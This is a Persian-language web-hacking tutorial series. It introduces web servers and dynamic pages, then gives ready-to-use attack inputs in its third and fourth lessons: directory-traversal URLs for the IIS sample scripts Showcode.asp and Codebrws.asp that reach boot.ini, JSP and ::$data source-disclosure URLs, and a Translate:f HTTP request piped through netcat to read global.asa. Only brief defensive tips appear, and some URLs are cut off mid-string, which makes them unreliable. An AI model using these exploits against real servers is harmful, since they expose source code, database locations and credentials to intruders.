در وب هکينگ شما مهمترين چيزي که نياز داريد يک مرورگر وب مانند اينترنت اکسپلورر است که خوشبختانه از آن برخوردار هستيد . وب هکينگ علم ور رفتن با يو آر ال و فرمهاي تحت وب ميباشد . شما تا به حال نمونه هاي زيادي از وب هکينگ مانند اس کيو ال انجکشن استفاده از /../ در يو آر ال و ... رو ديده ايد . خوب در اين آموزشها من سعي کردم آموزش همين نوع حمله هاي نسبتا ساده و کم دردسر رو آموزش بدهم ولي آموزشهاي بعدي به صورت عملي خواهد بود تا شما بيشتر تجربه در وب هکينگ پيدا کنيد

.................................................. .................................................. ...

مقدمه کوتاهي براي دفاع در برابر وب هکينگ

دفاع در برابر وب هکينگ به همان سادگي خود وب هکينگ ميباشد براي دفاع در برابر اين نوع حملات فقط اضافه کردن چند دستور شرطي به برنامه تحت وبتان کافي خواهد بود و شما نياز به ابزار دفاعي خاصي مانند فايروال نداريد. خوب در آموزشهاي بعدي روش دفاع در برابر هر نوع از حمله ها به طور کامل توضيح داده خواهد شد و البته يک جلسه از آموزشها هم مربوط به تفسير لوگ فايلها خواهد بود . خدا نگهدار و به اميد موفقيت تا درس بعدي باي باي

-----------------------------------------------------------------------------

وب هكينگ(2)

وب هکينگ چيست؟

وب هکينگ به نوعي از حملات نفوذگران اينترنتي گفته ميشود که در اون ميخوان به يک وب سرور دسترسي پيدا کنند. وب سرور نوعي از سرور ها ميباشد که از آن براي نگهداري و نمايش دادن صفحات وب استفاده ميشود . هر وب سروري مانند رايانه هاي ديگر داراي سيستم عامل است و يک نرمافزار مديريتي وب سرور را نيز دارا ميباشد اين ها ميتونند شامل زير باشند

IIS,APACHE,TOMCAT

و امثال اينها خوب صفحاتي هم که وب سرور رو نمايش ميدن به دو دسته مختلف تقسيم ميشن که در زير گفتم

Dynamic , Static

صفحات استاتيک يا ثابت صفحاتي هستند که هميشه ثابت بوده و هيچ تغييري در آنها ايجاد نميشود به عنوان مثال صفحات ساده نوشته شده با اچ تي ام ال که البته در آنها از جاوا اسکريپت و اسکريپتهاي ديگري استفاده نشده نوعي از صفحات ثابت هستند

صفحات ديناميک صفحاتي هستند که بر اساس نوع دادههاي وارد شده به آنها شکلهاي مختلفي به خود ميگيرند به عنوان مثال صفحاتي که با زبانهاي

ASP , PHP , JSP

و اسکريپتهاي جاوا اسکريپت نوشته شده اند از اين دسته اند و طرض اجراي صفحات نيز جاءز اهميت ميباشد بعضي از صفحات بايد در سمت کاربر يا همان يوزر پردازش و نمايش داده شود و گروهي ديگر در سمت سرور وسپس صفحه اي را مانند همون صفحه اول توليد ميکنن که در سمت کاربر پردازش ميشه

از گروه اول ميتونم زبانهاي اچ تي ام ال و جاوا اسکريپت رو مثال بزنم و در گروه دوم هم زبانهاي زير

ASP , PHP , JSP

هم قرار ميگيرند . پس با توجه به گفته هاي بالا و اين قسمت ميتونيم نتيجهبگيريم که اکثر صفحات ديناميک در سمت سرور پردازش ميشوند. علت اين امر چيست؟ شايد يکي از علل اصلي امنيت برنامه ها باشد زيرا به طور معمول سورس کد اين صفحات اطلاعات بسيار خوبي رو براي نفوذگر در خود دارند . براي اين مورد ميتونيم سيستم مديريت وبلاگ آسپ سوار رو نام ببريم که دو تا صفحه موجود در اون حاوي آدرس بانک اطلاعاتي و نام کاربري و پسوورد وبلاگ ميباشن ولي به علت اينکه اين صفحات به زبان آاس پي نوشته شده اند به سادگي نميتونيم به سورس کد اونها دسترسي پيدا کنيم خوب تا اينجا واسه اين درس بسه در درس بعدي چگونگي دستيابي به سورس کد رو هم سعي ميکنم توضيح بدم

------------------------------------------------------------------------------

وب هكينگ(3)

مشاهده سورس صفحات در سرويس دهنده وب

خوب در درس قبلي گفتم که در اين درس دسترسي به سورس صفخات اجرا شده رو در سمت سرور توضيح ميدم اما چند آسيب پذيري مهم و خطرناک به نفوذ گر اجازه اي کار رو ميدهند در اين درس آموزش کامل اين کار رو ميدم

Showcode.asp And Codebrws.asp

اين آسيب پذيري در آي آي اس 4 عمل ميکند آن هم در صورتي که هنگام نصب آي آي اس

SampleAspCode

را نيز نصب کنيد . خوب استفاده از اين آسيب پذيري بسيار آسونه و مثل وارد کردن نام يک سايت تو آدرس بار ميباشد.

Showcode.asp

http://site.com/msadc/Samples/SELEC.../../../boot.ini

Codebrws.asp

http://site.com/iissamples/exair/ho...../../../../../[file name]

Codebrws.asp in IIS 5

http://site.com/iissamples/sdk/asp/...%ae/default.asp

JSP

در صورتي که هدف جي اس پي باشد و بر روي سرويس دهنده آپاچي يا تم کت باشد به سادگي ميتونين به سورس اون دسترسي پيدا کنين مثال زير

http://site.com/index.js%70

http://site.com/exsamples/jsp/num/numguess.js%70

Asp

نمونه اي از کار اين آسيب پذيري

http://site.com/something.asp::$data

خوب تا اينجا دسترسي به سورس صفحات رو هم ياد گرفتيد در درس بعدي

Buffer Over Flow

رو از مقدماتي تا پيشرفته درس ميدم

-----------------------------------------------------------------------------------------

وب هکينگ۴

وب در مقاله هاي قبلي دسترسي به سورس صفحات رو ياد گرفتيم در اين مقاله هم ميخوام به شما يکي از پر استفاده ترين آسيب پذيري ها رو ياد بدهم که نام اين آسيب پذيري هم در زير ميگم

Translate:f

يکي از مزيت هاي اين آسيبپذيري اين است که بر روي تمام آي آي اس ها بغير از آي آي اس 6 کار ميکنه . کار با اين آسيب پذيري بسيار ساده است شما ابتدا متن زير را در يک فايل دات تي ايکس تي ذخيره کنيد

GET /global.asa\ HTTP/1.0

HOST : 64.187.61.230

User-Agent: SensePostData

Content-Type: application/x-www-form-urlencoded

Translate:f

[CRLF]

[CRLF]

حالا به کامند پرومپت بريد و دستور زير رو وارد کنيد

C:\>type sourcer.txt| nc -nvv 127.0.0.1 80

راه مقابله با اين آسيب پذيري

بهترين راه اين است که شما اطلاعات مهم رو در اين فايلها قرار ندين مانند محل قرار گيري بانک اطلاعاتي و ... راه ديگر اين است که آي آي اس رو ارتقاء بدين . خوب چون هنوز اين مطلب تموم نشده سعي ميکنم در مقالات بعدي سرريزي بافر رو درس بدم

All the Fun you'll ever Need!

سلام لطفا نظر بدهيد